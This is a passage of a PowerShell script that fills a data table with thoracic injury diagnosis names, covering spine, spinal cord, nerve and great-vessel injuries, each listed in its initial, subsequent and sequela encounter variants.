T12/L1 thoracic vertebra","Subluxation of T12/L1 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T12/L1 thoracic vertebra","Subluxation of T12/L1 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of T12/L1 thoracic vertebra","Subluxation of T12/L1 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of T12/L1 thoracic vertebra","Dislocation of T12/L1 thoracic vertebra, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T12/L1 thoracic vertebra","Dislocation of T12/L1 thoracic vertebra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of T12/L1 thoracic vertebra","Dislocation of T12/L1 thoracic vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified part of thorax","Dislocation of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified part of thorax","Dislocation of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified part of thorax","Dislocation of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of thorax","Dislocation of other parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of thorax","Dislocation of other parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of thorax","Dislocation of other parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of thoracic spine","Sprain of ligaments of thoracic spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of thoracic spine","Sprain of ligaments of thoracic spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ligaments of thoracic spine","Sprain of ligaments of thoracic spine, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of ribs","Sprain of ribs, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ribs","Sprain of ribs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of ribs","Sprain of ribs, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of sternoclavicular (joint) (ligament)","Sprain of sternoclavicular (joint) (ligament), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of sternoclavicular (joint) (ligament)","Sprain of sternoclavicular (joint) (ligament), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of sternoclavicular (joint) (ligament)","Sprain of sternoclavicular (joint) (ligament), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of chondrosternal joint","Sprain of chondrosternal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of chondrosternal joint","Sprain of chondrosternal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of chondrosternal joint","Sprain of chondrosternal joint, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of sternum","Other sprain of sternum, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of sternum","Other sprain of sternum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of sternum","Other sprain of sternum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of sternum","Unspecified sprain of sternum, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of sternum","Unspecified sprain of sternum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of sternum","Unspecified sprain of sternum, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of thorax","Sprain of other specified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of thorax","Sprain of other specified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of thorax","Sprain of other specified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of thorax","Sprain of unspecified parts of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of thorax","Sprain of unspecified parts of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of thorax","Sprain of unspecified parts of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Concussion and edema of thoracic spinal cord","Concussion and edema of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of thoracic spinal cord","Concussion and edema of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion and edema of thoracic spinal cord","Concussion and edema of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T1 level of thoracic spinal cord","Unspecified injury at T1 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T1 level of thoracic spinal cord","Unspecified injury at T1 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T1 level of thoracic spinal cord","Unspecified injury at T1 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T2-T6 level of thoracic spinal cord","Unspecified injury at T2-T6 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T2-T6 level of thoracic spinal cord","Unspecified injury at T2-T6 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T2-T6 level of thoracic spinal cord","Unspecified injury at T2-T6 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T7-T10 level of thoracic spinal cord","Unspecified injury at T7-T10 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T7-T10 level of thoracic spinal cord","Unspecified injury at T7-T10 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T7-T10 level of thoracic spinal cord","Unspecified injury at T7-T10 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T11-T12 level of thoracic spinal cord","Unspecified injury at T11-T12 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T11-T12 level of thoracic spinal cord","Unspecified injury at T11-T12 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at T11-T12 level of thoracic spinal cord","Unspecified injury at T11-T12 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of thoracic spinal cord","Unspecified injury at unspecified level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of thoracic spinal cord","Unspecified injury at unspecified level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury at unspecified level of thoracic spinal cord","Unspecified injury at unspecified level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at T1 level of thoracic spinal cord","Complete lesion at T1 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T1 level of thoracic spinal cord","Complete lesion at T1 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T1 level of thoracic spinal cord","Complete lesion at T1 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at T2-T6 level of thoracic spinal cord","Complete lesion at T2-T6 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T2-T6 level of thoracic spinal cord","Complete lesion at T2-T6 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T2-T6 level of thoracic spinal cord","Complete lesion at T2-T6 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at T7-T10 level of thoracic spinal cord","Complete lesion at T7-T10 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T7-T10 level of thoracic spinal cord","Complete lesion at T7-T10 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T7-T10 level of thoracic spinal cord","Complete lesion at T7-T10 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at T11-T12 level of thoracic spinal cord","Complete lesion at T11-T12 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T11-T12 level of thoracic spinal cord","Complete lesion at T11-T12 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at T11-T12 level of thoracic spinal cord","Complete lesion at T11-T12 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of thoracic spinal cord","Complete lesion at unspecified level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of thoracic spinal cord","Complete lesion at unspecified level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete lesion at unspecified level of thoracic spinal cord","Complete lesion at unspecified level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T1 level of thoracic spinal cord","Anterior cord syndrome at T1 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T1 level of thoracic spinal cord","Anterior cord syndrome at T1 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T1 level of thoracic spinal cord","Anterior cord syndrome at T1 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T2-T6 level of thoracic spinal cord","Anterior cord syndrome at T2-T6 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T2-T6 level of thoracic spinal cord","Anterior cord syndrome at T2-T6 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T2-T6 level of thoracic spinal cord","Anterior cord syndrome at T2-T6 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T7-T10 level of thoracic spinal cord","Anterior cord syndrome at T7-T10 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T7-T10 level of thoracic spinal cord","Anterior cord syndrome at T7-T10 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T7-T10 level of thoracic spinal cord","Anterior cord syndrome at T7-T10 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T11-T12 level of thoracic spinal cord","Anterior cord syndrome at T11-T12 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T11-T12 level of thoracic spinal cord","Anterior cord syndrome at T11-T12 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at T11-T12 level of thoracic spinal cord","Anterior cord syndrome at T11-T12 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of thoracic spinal cord","Anterior cord syndrome at unspecified level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of thoracic spinal cord","Anterior cord syndrome at unspecified level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior cord syndrome at unspecified level of thoracic spinal cord","Anterior cord syndrome at unspecified level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T1 level of thoracic spinal cord","Brown-Sequard syndrome at T1 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T1 level of thoracic spinal cord","Brown-Sequard syndrome at T1 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T1 level of thoracic spinal cord","Brown-Sequard syndrome at T1 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord","Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord","Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord","Brown-Sequard syndrome at T2-T6 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord","Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord","Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord","Brown-Sequard syndrome at T7-T10 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord","Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord","Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord","Brown-Sequard syndrome at T11-T12 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of thoracic spinal cord","Brown-Sequard syndrome at unspecified level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of thoracic spinal cord","Brown-Sequard syndrome at unspecified level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Brown-Sequard syndrome at unspecified level of thoracic spinal cord","Brown-Sequard syndrome at unspecified level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T1 level of thoracic spinal cord","Other incomplete lesion at T1 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T1 level of thoracic spinal cord","Other incomplete lesion at T1 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T1 level of thoracic spinal cord","Other incomplete lesion at T1 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T2-T6 level of thoracic spinal cord","Other incomplete lesion at T2-T6 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T2-T6 level of thoracic spinal cord","Other incomplete lesion at T2-T6 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T2-T6 level of thoracic spinal cord","Other incomplete lesion at T2-T6 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T7-T10 level of thoracic spinal cord","Other incomplete lesion at T7-T10 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T7-T10 level of thoracic spinal cord","Other incomplete lesion at T7-T10 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T7-T10 level of thoracic spinal cord","Other incomplete lesion at T7-T10 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T11-T12 level of thoracic spinal cord","Other incomplete lesion at T11-T12 level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T11-T12 level of thoracic spinal cord","Other incomplete lesion at T11-T12 level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at T11-T12 level of thoracic spinal cord","Other incomplete lesion at T11-T12 level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of thoracic spinal cord","Other incomplete lesion at unspecified level of thoracic spinal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of thoracic spinal cord","Other incomplete lesion at unspecified level of thoracic spinal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other incomplete lesion at unspecified level of thoracic spinal cord","Other incomplete lesion at unspecified level of thoracic spinal cord, sequela") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of thoracic spine","Injury of nerve root of thoracic spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of thoracic spine","Injury of nerve root of thoracic spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of nerve root of thoracic spine","Injury of nerve root of thoracic spine, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of thorax","Injury of peripheral nerves of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of thorax","Injury of peripheral nerves of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peripheral nerves of thorax","Injury of peripheral nerves of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Injury of thoracic sympathetic nervous system","Injury of thoracic sympathetic nervous system, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of thoracic sympathetic nervous system","Injury of thoracic sympathetic nervous system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of thoracic sympathetic nervous system","Injury of thoracic sympathetic nervous system, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of thorax","Injury of other specified nerves of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of thorax","Injury of other specified nerves of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other specified nerves of thorax","Injury of other specified nerves of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve of thorax","Injury of unspecified nerve of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve of thorax","Injury of unspecified nerve of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve of thorax","Injury of unspecified nerve of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thoracic aorta","Unspecified injury of thoracic aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thoracic aorta","Unspecified injury of thoracic aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of thoracic aorta","Unspecified injury of thoracic aorta, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of thoracic aorta","Minor laceration of thoracic aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of thoracic aorta","Minor laceration of thoracic aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of thoracic aorta","Minor laceration of thoracic aorta, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of thoracic aorta","Major laceration of thoracic aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of thoracic aorta","Major laceration of thoracic aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of thoracic aorta","Major laceration of thoracic aorta, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of thoracic aorta","Other specified injury of thoracic aorta, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of thoracic aorta","Other specified injury of thoracic aorta, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of thoracic aorta","Other specified injury of thoracic aorta, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian artery","Unspecified injury of right innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian artery","Unspecified injury of right innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian artery","Unspecified injury of right innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian artery","Unspecified injury of left innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian artery","Unspecified injury of left innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian artery","Unspecified injury of left innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian artery","Unspecified injury of unspecified innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian artery","Unspecified injury of unspecified innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian artery","Unspecified injury of unspecified innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian artery","Minor laceration of right innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian artery","Minor laceration of right innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian artery","Minor laceration of right innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian artery","Minor laceration of left innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian artery","Minor laceration of left innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian artery","Minor laceration of left innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian artery","Minor laceration of unspecified innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian artery","Minor laceration of unspecified innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian artery","Minor laceration of unspecified innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian artery","Major laceration of right innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian artery","Major laceration of right innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian artery","Major laceration of right innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian artery","Major laceration of left innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian artery","Major laceration of left innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian artery","Major laceration of left innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian artery","Major laceration of unspecified innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian artery","Major laceration of unspecified innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian artery","Major laceration of unspecified innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian artery","Other specified injury of right innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian artery","Other specified injury of right innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian artery","Other specified injury of right innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian artery","Other specified injury of left innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian artery","Other specified injury of left innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian artery","Other specified injury of left innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian artery","Other specified injury of unspecified innominate or subclavian artery, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian artery","Other specified injury of unspecified innominate or subclavian artery, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian artery","Other specified injury of unspecified innominate or subclavian artery, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior vena cava","Unspecified injury of superior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior vena cava","Unspecified injury of superior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superior vena cava","Unspecified injury of superior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior vena cava","Minor laceration of superior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior vena cava","Minor laceration of superior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of superior vena cava","Minor laceration of superior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of superior vena cava","Major laceration of superior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of superior vena cava","Major laceration of superior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of superior vena cava","Major laceration of superior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior vena cava","Other specified injury of superior vena cava, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior vena cava","Other specified injury of superior vena cava, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superior vena cava","Other specified injury of superior vena cava, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian vein","Unspecified injury of right innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian vein","Unspecified injury of right innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right innominate or subclavian vein","Unspecified injury of right innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian vein","Unspecified injury of left innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian vein","Unspecified injury of left innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left innominate or subclavian vein","Unspecified injury of left innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian vein","Unspecified injury of unspecified innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian vein","Unspecified injury of unspecified innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified innominate or subclavian vein","Unspecified injury of unspecified innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian vein","Minor laceration of right innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian vein","Minor laceration of right innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right innominate or subclavian vein","Minor laceration of right innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian vein","Minor laceration of left innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian vein","Minor laceration of left innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left innominate or subclavian vein","Minor laceration of left innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian vein","Minor laceration of unspecified innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian vein","Minor laceration of unspecified innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified innominate or subclavian vein","Minor laceration of unspecified innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian vein","Major laceration of right innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian vein","Major laceration of right innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right innominate or subclavian vein","Major laceration of right innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian vein","Major laceration of left innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian vein","Major laceration of left innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left innominate or subclavian vein","Major laceration of left innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian vein","Major laceration of unspecified innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian vein","Major laceration of unspecified innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified innominate or subclavian vein","Major laceration of unspecified innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian vein","Other specified injury of right innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian vein","Other specified injury of right innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right innominate or subclavian vein","Other specified injury of right innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian vein","Other specified injury of left innominate or subclavian vein, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian vein","Other specified injury of left innominate or subclavian vein, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left innominate or subclavian vein","Other specified injury of left innominate or subclavian vein, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified innominate or subclavian vein","Other specified injury of unspecified innominate or subclavian vein, initial encounter") 